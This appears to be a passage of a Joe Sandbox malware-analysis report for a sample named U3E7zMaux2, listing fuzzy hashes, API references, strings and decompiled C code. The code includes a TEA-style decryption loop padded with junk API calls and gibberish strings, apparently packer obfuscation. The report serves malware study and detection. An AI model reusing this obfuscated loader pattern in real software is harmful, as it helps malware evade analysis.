Opcode Fuzzy Hash: c47001169f558e7805078623876a8b3adc06a536d28c598f5f3b8a6f2b599519
Instruction Fuzzy Hash: C731AE299444599ECF2D57B0D44A1D1BFA0EF9A304F6A0DCACB91AFC57CA30A483C793

Uniqueness

Uniqueness Score: -1.00%

Function 00533253, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.659977483.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_U3E7zMaux2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf526be089bbf4f567823773968cea02f6975f775f586de3c71f4e573fc0c6e7
Instruction ID: 83ae19b3b31ca01dc60b2bae43842ad7638a23bf219a0d76ffffcdd269e34e4d
Opcode Fuzzy Hash: cf526be089bbf4f567823773968cea02f6975f775f586de3c71f4e573fc0c6e7
Instruction Fuzzy Hash: A631992990485D9FCB2D47759058191BBA4EF5E304FB60DCACB91AFD57CA30A883C293

Uniqueness

Uniqueness Score: -1.00%

Function 00520083, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.659970213.0000000000520000.00000040.00000001.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_520000_U3E7zMaux2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: c5ffd817a2775e3bfce92e77fe883a8605b1f2051616e155f476b9830c242b20
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 2A119E723401109FE740DE55ECC5FA677EAFF89320B298065ED04CB392D675E801C760

Uniqueness

Uniqueness Score: -1.00%

Function 00530042, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.659977483.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_U3E7zMaux2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 4c774fabf14f8baf890316c414b9d385ceb7f6d0593f21750707b76a2a9144a5
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: D81170723402009FD758DE65DCE5FA677EAFB88320B698155E908CB352D675EC01C760

Uniqueness

Uniqueness Score: -1.00%

Function 0040106C, Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 259
sleepthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040106C(unsigned int* _a4) {
				unsigned int _v12;
				signed int _v16;
				char _v20;
				short _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				signed int _v488;
				char _v492;
				signed int _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				long _v516;
				long _v520;
				void* _v534;
				struct _SYSTEMTIME _v536;
				struct _INPUT_RECORD _v556;
				char _v1584;
				intOrPtr* _t166;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t174;
				int _t180;
				signed int _t184;
				unsigned int* _t189;
				void* _t200;
				signed int _t204;
				signed int _t215;
				signed int _t216;

				_t166 = _a4;
				_v12 =  *_t166;
				_v488 =  *((intOrPtr*)(_t166 + 4));
				if( *0x43ed0c == 0xee) {
					Sleep(0);
					CreateThread(0, 0, 0, 0, 0, 0);
					GetStringTypeW(0, 0, 0, 0);
				}
				_t168 =  *0x41a528; // 0xfa315d2d
				_v504 = _t168;
				_t169 =  *0x41a52c; // 0x5ae99d39
				_v500 = _t169;
				_v20 = 0;
				E00401065( &_v20);
				_t200 = _v20 + 0x21d;
				if( *0x43ed0c == 0xc8) {
					GetStringTypeW(0, L"Wasavanayof dab jep", 0,  &_v24);
				}
				_t172 =  *0x41a530; // 0x119af78f
				_v512 = _t172;
				_t173 =  *0x41a534; // 0x50edd26b
				_v508 = _t173;
				_v492 = 0x20;
				do {
					_v24 = 2;
					_v24 = _v24 + 3;
					_t215 = _v12 << 4;
					if( *0x43ed0c == 0xc) {
						ReadConsoleInputW(0,  &_v556, 0,  &_v516);
					}
					_t174 =  *0x43ed0c;
					_t216 = _t215 + _v512;
					if(_t174 == 0xfa9) {
						 *0x43ed08 = 0xedeb2e40;
					}
					if(_t174 == 0x3eb) {
						 *0x43c0d4 = 0;
					}
					_v16 = _v12 >> 5;
					_t180 = _v16 + _v508 ^ _t216 ^ _t200 + _v12;
					 *0x43ed04 = 0x9150ce2e;
					_v16 = _t180;
					if( *0x43ed0c == 0x27) {
						InterlockedDecrement( &_v520);
						RaiseException(0, 0, 0, 0);
						_t180 = _v16;
					}
					_v488 = _v488 - _t180;
					if( *0x43ed0c == 0xc) {
						_v536 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						_t180 = GetTimeFormatA(0, 0,  &_v536, "Lefejobixad nezanelo zex vohopenap buxagukabu",  &_v1584, 0);
					}
					_t204 = _v488;
					_t184 = (_t204 >> 5) + _v500;
					_v16 = _t184;
					_v496 = (_t204 << 0x00000004) + _v504 ^ _t204 + _t200 ^ _t184;
					 *0x43c0d0 = 0;
					_v12 = _v12 - _v496;
					_v308 = 0x58bfb700;
					_v372 = 0xb7b3100;
					_v52 = 0x22f7a0fa;
					_v128 = 0x5f8d6f12;
					_v204 = 0x3da0bd0c;
					_v192 = 0x1087ed95;
					_v392 = 0x5c8ac66f;
					_v404 = 0x2d497a6a;
					_v196 = 0xb363ce9;
					_v364 = 0x72923bd1;
					_v248 = 0x6b593f5;
					_v460 = 0x17dbad6b;
					_v356 = 0x5244f954;
					_v124 = 0x50dac3ea;
					_v328 = 0x487bde5c;
					_v44 = 0xa733708;
					_v396 = 0x3b2217e1;
					_v276 = 0x3ad48611;
					_v80 = 0x45e56c5f;
					_v268 = 0x1ad1c0ab;
					_v472 = 0x29549cb0;
					_v348 = 0x59f0f79a;
					_v260 = 0x29e91f29;
					_v360 = 0x721e902e;
					_v340 = 0x4d15f5c6;
					_v184 = 0x6831fb04;
					_v216 = 0x3c255892;
					_v116 = 0x5816a642;
					_v288 = 0x7ae9c89;
					_v40 = 0x3fe3b511;
					_v36 = 0x7e65d0c1;
					_v252 = 0x2cb8ca30;
					_v108 = 0x7000ce59;
					_v480 = 0x6dc6d44;
					_v304 = 0x497f93f5;
					_v484 = 0x4e3080de;
					_v32 = 0x6642cffb;
					_v120 = 0x51ded34b;
					_v208 = 0xf893257;
					_v188 = 0x48ebaf87;
					_v176 = 0x3a1b15c5;
					_v352 = 0x2fc96ae9;
					_v244 = 0x771f1d46;
					_v240 = 0xf638532;
					_v280 = 0x22b6e9e1;
					_v72 = 0xf8107c6;
					_v408 = 0xc977849;
					_v168 = 0x7a375fc2;
					_v476 = 0x222631ea;
					_v468 = 0x72e34194;
					_v100 = 0x53e810b;
					_v92 = 0x765bd3bd;
					_v416 = 0xfc2b546;
					_v84 = 0x5a3570f9;
					_v332 = 0x799057b7;
					_v180 = 0x7d8d8fad;
					_v20 = 0x183b8b6c;
					_v300 = 0x208237f3;
					_v172 = 0x37857544;
					_v76 = 0x194d6bc7;
					_v144 = 0x761e73a;
					_v164 = 0x23b5b072;
					_v264 = 0x28dd809d;
					_v156 = 0x4bae779b;
					_v64 = 0x31f852be;
					_v440 = 0x2d27aa;
					_v292 = 0x3b164838;
					_v428 = 0x2828d0ee;
					_v112 = 0x13bc3fda;
					_v296 = 0x32032ef2;
					_v436 = 0x66131123;
					_v444 = 0x5fd083d9;
					_v236 = 0x5095c0f2;
					_v384 = 0x191d2124;
					_v160 = 0x26972506;
					_v368 = 0x436837e6;
					_v388 = 0x6e37dce0;
					_v56 = 0x48ceb1ee;
					_v320 = 0x135da928;
					_v104 = 0x498338b7;
					_v200 = 0x1dcc46f6;
					_v380 = 0x3725547b;
					_v424 = 0x5e007fae;
					_v344 = 0x14444bb8;
					_v148 = 0x69cfd0dc;
					_v152 = 0x31b82d41;
					_v336 = 0x633ae043;
					_v452 = 0x5a8da93d;
					_v28 = 0x55998bc1;
					_v232 = 0x4bdbdfa5;
					_v456 = 0x3a998bf2;
					_v420 = 0x279d3dec;
					_v140 = 0x66a87b65;
					_v48 = 0x22513e86;
					_v136 = 0x9e3e723;
					_v68 = 0x277c2432;
					_v284 = 0x3ed62a3;
					_v96 = 0x5171fe35;
					_v312 = 0x25314484;
					_v228 = 0x1665fe93;
					_v464 = 0x2162be98;
					_v324 = 0x55d5cb43;
					_v412 = 0x598c0136;
					_v220 = 0x6c22b187;
					_v132 = 0x2fcaa1cc;
					_v88 = 0x6167089e;
					_v256 = 0x66f75803;
					_v212 = 0x585cb709;
					_v224 = 0x27007ca;
					_v272 = 0x28381a77;
					_v376 = 0x3808fdae;
					_v448 = 0x4f9bfef4;
					_v60 = 0x31e750c5;
					_v400 = 0x5713314d;
					_v316 = 0x43138e95;
					_v432 = 0x126a3b55;
					_t200 = _t200 + 0x61c88647;
					_t160 =  &_v492;
					 *_t160 = _v492 - 1;
				} while ( *_t160 != 0);
				_t189 = _a4;
				 *_t189 = _v12;
				_t189[1] = _v488;
				return _t189;
			}

0x00401075
0x00401092
0x00401095
0x0040109b
0x0040109e
0x004010aa
0x004010b4
0x004010b4
0x004010b6
0x004010bb
0x004010c1
0x004010c6
0x004010cf
0x004010d2
0x004010da
0x004010ea
0x004010f7
0x004010f7
0x004010f9
0x004010fe
0x00401104
0x00401109
0x0040110f
0x00401119
0x00401119
0x00401120
0x00401127
0x00401131
0x00401143
0x00401143
0x00401149
0x0040114e
0x00401159
0x0040115b
0x0040115b
0x0040116a
0x0040116c
0x0040116c
0x0040117e
0x0040118e
0x00401197
0x004011a1
0x004011a4
0x004011ad
0x004011b7
0x004011bd
0x004011bd
0x004011c0
0x004011cd
0x004011d1
0x004011de
0x004011df
0x004011e0
0x004011e2
0x004011f9
0x004011f9
0x00401204
0x0040121a
0x00401226
0x00401229
0x0040122f
0x0040123b
0x0040123e
0x00401248
0x00401252
0x00401259
0x00401260
0x0040126a
0x00401274
0x0040127e
0x00401288
0x00401292
0x0040129c
0x004012a6
0x004012b0
0x004012ba
0x004012c1
0x004012cb
0x004012d2
0x004012dc
0x004012e6
0x004012ed
0x004012f7
0x00401301
0x0040130b
0x00401315
0x0040131f
0x00401329
0x00401333
0x0040133d
0x00401344
0x0040134e
0x00401355
0x0040135c
0x00401366
0x0040136d
0x00401377
0x00401381
0x0040138b
0x00401392
0x00401399
0x004013a3
0x004013ad
0x004013b7
0x004013c1
0x004013cb
0x004013d5
0x004013df
0x004013e6
0x004013f0
0x004013fa
0x00401404
0x0040140e
0x00401415
0x0040141c
0x00401426
0x0040142d
0x00401437
0x00401441
0x00401448
0x00401452
0x0040145c
0x00401463
0x0040146d
0x00401477
0x00401481
0x0040148b
0x00401492
0x0040149c
0x004014a6
0x004014b0
0x004014b7
0x004014c1
0x004014cb
0x004014d5
0x004014df
0x004014e9
0x004014f3
0x004014fd
0x00401507
0x0040150e
0x00401518
0x0040151f
0x00401529
0x00401533
0x0040153d
0x00401547
0x00401551
0x0040155b
0x00401565
0x0040156f
0x00401576
0x00401580
0x0040158a
0x00401594
0x0040159e
0x004015a5
0x004015af
0x004015b6
0x004015c0
0x004015c7
0x004015d1
0x004015db
0x004015e5
0x004015ef
0x004015f9
0x00401603
0x0040160a
0x00401611
0x0040161b
0x00401625
0x0040162f
0x00401639
0x00401643
0x0040164d
0x00401654
0x0040165e
0x00401668
0x00401672
0x00401678
0x00401678
0x00401678
0x00401687
0x0040168b
0x00401694
0x00401699

APIs

Sleep.KERNEL32(00000000), ref: 0040109E
CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004010AA
GetStringTypeW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004010B4
GetStringTypeW.KERNEL32(00000000,Wasavanayof dab jep,00000000,?), ref: 004010F7
ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00401143
InterlockedDecrement.KERNEL32(?), ref: 004011AD
RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 004011B7
GetTimeFormatA.KERNEL32(00000000,00000000,?,Lefejobixad nezanelo zex vohopenap buxagukabu,?,00000000), ref: 004011F9

Strings

, xrefs: 0040110F
1&", xrefs: 004013FA
Lefejobixad nezanelo zex vohopenap buxagukabu, xrefs: 004011EB
_lE, xrefs: 004012E6
Wasavanayof dab jep, xrefs: 004010F1
#, xrefs: 004015A5
jzI-, xrefs: 0040127E
2$|', xrefs: 004015AF
{T%7, xrefs: 00401529
7hC, xrefs: 004014F3
C:c, xrefs: 0040155B

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: StringType$ConsoleCreateDecrementExceptionFormatInputInterlockedRaiseReadSleepThreadTime
String ID: $#$2$|'$C:c$Lefejobixad nezanelo zex vohopenap buxagukabu$Wasavanayof dab jep$_lE$jzI-${T%7$1&"$7hC
API String ID: 3300792823-2628037626
Opcode ID: 9fa339254a3e7d4a5b40ebb2aeb764b319e02db9200d94320283ed07eb2c83e2
Instruction ID: 6caa0d01e35f521e0e83d4b22aea008fdfe3bc6a8a6cc47363b83f0dca78bc6b
Opcode Fuzzy Hash: 9fa339254a3e7d4a5b40ebb2aeb764b319e02db9200d94320283ed07eb2c83e2
Instruction Fuzzy Hash: 2BE1DBB0806269DFDB64CF99DD84BDEBBB4FB09304F1085E9D509AB210C7345A86CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040169C, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 67
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040169C() {
				char _v8;
				long _v12;
				void _v1036;
				char _v2060;
				char _v3084;
				char _v4108;
				char _v6156;
				unsigned int _t11;
				unsigned int _t25;
				unsigned int* _t26;
				unsigned int* _t27;

				E00410920(0x180c);
				_t26 =  *0x43e7f8;
				_t11 =  *0x43ed0c >> 3;
				if(_t11 > 0) {
					_t27 = _t26;
					_t25 = _t11;
					do {
						if( *0x43ed0c == 0xae9) {
							SetFileTime(0, 0, 0, 0);
							__imp__DnsHostnameToComputerNameA("yujacom",  &_v4108,  &_v8);
							__imp__GetLongPathNameW(L"sowijegucunuwelumegugenemonopehecebozececopiduporaneganebetasohuwihajanojuh",  &_v6156, 0);
							GetFileType(0);
							ReadConsoleA(0,  &_v1036, 0,  &_v12, 0);
							__imp__GetConsoleAliasesLengthW(0);
							SetConsoleTitleW(L"kepamufugimuceputolomibuwufixijuwakijaxitaduza");
							GetModuleFileNameA(0,  &_v2060, 0);
							GetProfileSectionA("yazusupuxifojemevaxatomoworokavorecojesoc",  &_v3084, 0);
						}
						_t11 = E0040106C(_t27);
						_t27 = _t27 + 8;
						_t25 = _t25 - 1;
					} while (_t25 != 0);
				}
				return _t11;
			}

0x004016a4
0x004016ae
0x004016b6
0x004016be
0x004016c4
0x004016c6
0x004016c8
0x004016d2
0x004016dc
0x004016f2
0x00401705
0x0040170c
0x00401720
0x00401727
0x00401732
0x00401741
0x00401754
0x00401754
0x0040175b
0x00401760
0x00401763
0x00401763
0x004016c8
0x0040176e

APIs

SetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 004016DC
DnsHostnameToComputerNameA.KERNEL32 ref: 004016F2
GetLongPathNameW.KERNEL32 ref: 00401705
GetFileType.KERNEL32(00000000), ref: 0040170C
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00401720
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00401727
SetConsoleTitleW.KERNEL32(kepamufugimuceputolomibuwufixijuwakijaxitaduza), ref: 00401732
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00401741
GetProfileSectionA.KERNEL32(yazusupuxifojemevaxatomoworokavorecojesoc,?,00000000), ref: 00401754

Strings

kepamufugimuceputolomibuwufixijuwakijaxitaduza, xrefs: 0040172D
yazusupuxifojemevaxatomoworokavorecojesoc, xrefs: 0040174F
yujacom, xrefs: 004016ED
sowijegucunuwelumegugenemonopehecebozececopiduporaneganebetasohuwihajanojuh, xrefs: 00401700

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: ConsoleFileName$AliasesComputerHostnameLengthLongModulePathProfileReadSectionTimeTitleType
String ID: kepamufugimuceputolomibuwufixijuwakijaxitaduza$sowijegucunuwelumegugenemonopehecebozececopiduporaneganebetasohuwihajanojuh$yazusupuxifojemevaxatomoworokavorecojesoc$yujacom
API String ID: 3522130835-16586494
Opcode ID: 923a9e58c7a28637514fefc2fd9a19b2c3a8bedb8a5801480ac3687d40364c18
Instruction ID: e2b729ced6315af263480ac6f61d612d4a88790f41b233517b0b241154f8cd37
Opcode Fuzzy Hash: 923a9e58c7a28637514fefc2fd9a19b2c3a8bedb8a5801480ac3687d40364c18
Instruction Fuzzy Hash: CF115BB6502128BBD711ABA4EC48CEB7BBCEF4D342B004072F606E2154CA745B85CBB9

Uniqueness

Uniqueness Score: -1.00%

Function 004092C2, Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E004092C2(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x417c00);
				E00404CA4(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00403736(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00407DEA(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00407DEA(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E00407DEA(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00407DEA(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E004037DB(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E004093E8(_t48, _t53, _t55, _t57, _t61);
				return E00404CE9( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x004092c2
0x004092c2
0x004092c2
0x004092c4
0x004092c9
0x004092ce
0x004092d0
0x004092d3
0x004092d6
0x004092d9
0x004092e0
0x004092f1
0x004092ff
0x0040930d
0x00409315
0x00409323
0x00409329
0x00409330
0x00409333
0x00409349
0x0040934c
0x004093c1
0x004093c8
0x004093cf
0x004093dc

APIs

__CreateFrameInfo.LIBCMT ref: 004092EA

Part of subcall function 00403736: __getptd.LIBCMT ref: 00403744
Part of subcall function 00403736: __getptd.LIBCMT ref: 00403752

__getptd.LIBCMT ref: 004092F4

Part of subcall function 00407DEA: __getptd_noexit.LIBCMT ref: 00407DED
Part of subcall function 00407DEA: __amsg_exit.LIBCMT ref: 00407DFA

__getptd.LIBCMT ref: 00409302
__getptd.LIBCMT ref: 00409310
__getptd.LIBCMT ref: 0040931B
_CallCatchBlock2.LIBCMT ref: 00409341

Part of subcall function 004037DB: __CallSettingFrame@12.LIBCMT ref: 00403827

Part of subcall function 004093E8: __getptd.LIBCMT ref: 004093F7
Part of subcall function 004093E8: __getptd.LIBCMT ref: 00409405

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: ab31da0ae0b94152fa53e6b25f0da6aecfc5f2252845cde48f2e8d539b054dd3
Instruction ID: 0b4b00b17f5c0f033c6b13b670b65cf56679f155cec22cfc341f5e85b63ef726
Opcode Fuzzy Hash: ab31da0ae0b94152fa53e6b25f0da6aecfc5f2252845cde48f2e8d539b054dd3
Instruction Fuzzy Hash: BF11D7B1D04209DFDB01EFA5C845AED7BB0FF48319F11806AF814A7292EB389A51DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040966F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 28%

			E0040966F(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E004095DD(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E0040348E(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0040905A(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E004092C2(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E00403447(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x0040966f
0x0040966f
0x0040966f
0x0040966f
0x0040966f
0x00409674
0x00409678
0x0040967a
0x0040967d
0x0040967e
0x0040967f
0x00409682
0x00409687
0x00409687
0x0040968a
0x0040968e
0x00409691
0x00409696
0x00409693
0x00409693
0x00409693
0x00409699
0x0040969e
0x004096a0
0x004096a3
0x004096a6
0x004096a7
0x004096af
0x004096b4
0x004096b8
0x004096bb
0x004096be
0x004096c4
0x004096c5
0x004096c8
0x004096d2
0x004096d6
0x00000000
0x004096d6
0x004096dc

APIs

___BuildCatchObject.LIBCMT ref: 00409682

Part of subcall function 004095DD: ___BuildCatchObjectHelper.LIBCMT ref: 00409613

_UnwindNestedFrames.LIBCMT ref: 00409699
___FrameUnwindToState.LIBCMT ref: 004096A7

Strings

d|A, xrefs: 00409671
csm, xrefs: 0040967E, 00409693, 004096A6, 004096C4, 004096D4

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$d|A
API String ID: 2163707966-1332099821
Opcode ID: d22ffe9363a6998e1e2d35ed5cd282cdf03ba47786016133a39b01d8c6c55dd1
Instruction ID: 53e9afd385f30e9fae809e4ae3bc43e40e9c9c1ab0e59ab87651837acf80937f
